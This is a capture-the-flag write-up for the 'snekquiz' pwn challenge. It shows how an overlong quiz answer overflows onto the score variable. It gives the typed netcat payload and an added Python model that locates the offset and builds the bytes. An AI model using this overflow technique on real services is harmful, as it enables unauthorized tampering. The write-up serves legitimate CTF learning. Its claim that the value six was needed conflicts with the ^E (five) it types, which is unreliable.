snekquiz

Challenge author: JP Smith (SIGPwny)
Write-up author: Vanilla (Batman's Kitchen)
Points: 200
Category: pwn

test ur noledge

We connect to the endpoint provided and see a nice quiz about snek, with three questions. I answer poorly and it gives me zero points, and tells me I need five points, and gives me the right answers. I connect again and answer everything right and get all three possible points. But I need five!

OK, try stuff. Format string? No. Long string? It tells me I must be a hacker. OK, hack hack. I take the number that it tells me is my number of points and convert it to ASCII to locate where in my input string it was. I replace that with the number 5, and I'm good to go.

Tip: a lot of people would resort to Python or some other scripting language here, but you don't really need it. Knowing a little about terminal character processing goes a long way. In particular: in general, holding control and pressing a character generates the byte that character would normally generate, with bit 7 (the 0x40 bit) cleared. (For example, ^M is carriage return, ^G is bell, and ^@ is NUL.) Sometimes these have special meanings to the terminal, like ^C. (Though that can be changed! Look at the man page for stty if you dare; or have fun by running stty intr f and discover that your interrupt key is now lowercase f, no control needed!) In any case, these special meanings can be overridden by prefixing them with ^V (presumably for verbatim). Anyway, I needed the value six in that spot to make the program happy for some reason, so in my netcat I just wrote something like:

hey I like ctf let me just fill up this buffer ok ^V^E^V^@^V^@^V^@

and I've solved it without ever touching a programming language.
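Two steps above deserve a concrete illustration: turning the reported score back into bytes to find where the score field overlaps the input, and rendering the resulting bytes as ^V-prefixed control characters that can be typed straight into netcat. The following Python is an added example, not part of this write-up or of the challenge binary. It assumes a toy memory layout (a 48-byte answer buffer followed immediately by a 4-byte little-endian signed score, copied without a bounds check), which is a guess made for the demonstration; the probe string and the 0x40-bit rule for control characters come from the text.

```python
import struct

# Assumed layout of the toy model (not the real challenge): 48-byte
# answer buffer, then a 4-byte little-endian signed int holding the score.
NAME_SIZE = 48
POINTS_OFFSET = 48

# Constructed probe: the write-up's filler plus a unique tail so that the
# four bytes landing on the score field are easy to recognise.
PROBE = "hey I like ctf let me just fill up this buffer ok 0123456789"


def quiz_model(answer_text, points_earned=3):
    """Toy model of the vulnerable program: set the score, then copy the
    answer into the buffer with no length check, so a long answer runs
    over the score. Returns the score the program would print (as %d)."""
    mem = bytearray(NAME_SIZE + 4)
    struct.pack_into("<i", mem, POINTS_OFFSET, points_earned)
    data = answer_text.encode("latin-1")
    mem[0:len(data)] = data          # unbounded copy: may extend past the score
    return struct.unpack_from("<i", mem, POINTS_OFFSET)[0]


def find_points_offset(reported_points, sent_text):
    """The program printed the (overwritten) score as an integer. Convert
    it back to its little-endian bytes and look for them in what we sent;
    the match tells us where in our input the score field sits."""
    needle = struct.pack("<I", reported_points & 0xFFFFFFFF)
    idx = sent_text.encode("latin-1").find(needle)
    return idx if idx >= 0 else None


def build_payload(sent_text, offset, wanted_points):
    """Same input as before, with the four bytes at `offset` replaced by
    the score we want, little-endian."""
    data = bytearray(sent_text.encode("latin-1"))
    data[offset:offset + 4] = struct.pack("<i", wanted_points)
    return bytes(data)


def ctrl_byte(ch):
    """Byte the terminal sends for Ctrl+ch: the character's code with the
    0x40 bit cleared (so ^M -> 0x0D, ^@ -> 0x00). ^? is the special case
    that yields DEL (0x7F)."""
    ch = ch.upper()
    if ch == "?":
        return 0x7F
    return ord(ch) & 0x1F


def caret_notation(byte):
    """Render one byte as something typeable: printable bytes as-is,
    control bytes as ^V followed by the caret form, since ^V tells the
    terminal to pass the next keystroke through verbatim."""
    if 0x20 <= byte < 0x7F:
        return chr(byte)
    if byte == 0x7F:
        return "^V^?"
    if byte < 0x20:
        return "^V^" + chr(byte + 0x40)
    raise ValueError("byte %#x cannot be typed with caret notation" % byte)


def typeable(payload):
    return "".join(caret_notation(b) for b in payload)


def solve(wanted_points=5):
    """End-to-end against the toy model: probe, locate the score field,
    rewrite it, and return (offset, keystrokes to type)."""
    reported = quiz_model(PROBE)                      # score printed after the overflow
    offset = find_points_offset(reported, PROBE)
    payload = build_payload(PROBE[:offset + 4], offset, wanted_points)
    # Verify against the model before typing anything at the real service.
    if quiz_model(payload.decode("latin-1")) != wanted_points:
        raise RuntimeError("model did not accept the rewritten score")
    return offset, typeable(payload)


if __name__ == "__main__":
    off, keys = solve()
    print("score field starts at input offset", off)
    print("type this into nc:", keys)
```

Running it prints the offset (48 under the assumed layout) and a line ending in ^V^E^V^@^V^@^V^@, the same shape as the keystrokes in the write-up, with ^E being the byte 0x05. The `& 0xFFFFFFFF` in `find_points_offset` matters when the overwritten score prints as a negative number, which happens whenever the fourth byte that lands on it has its top bit set.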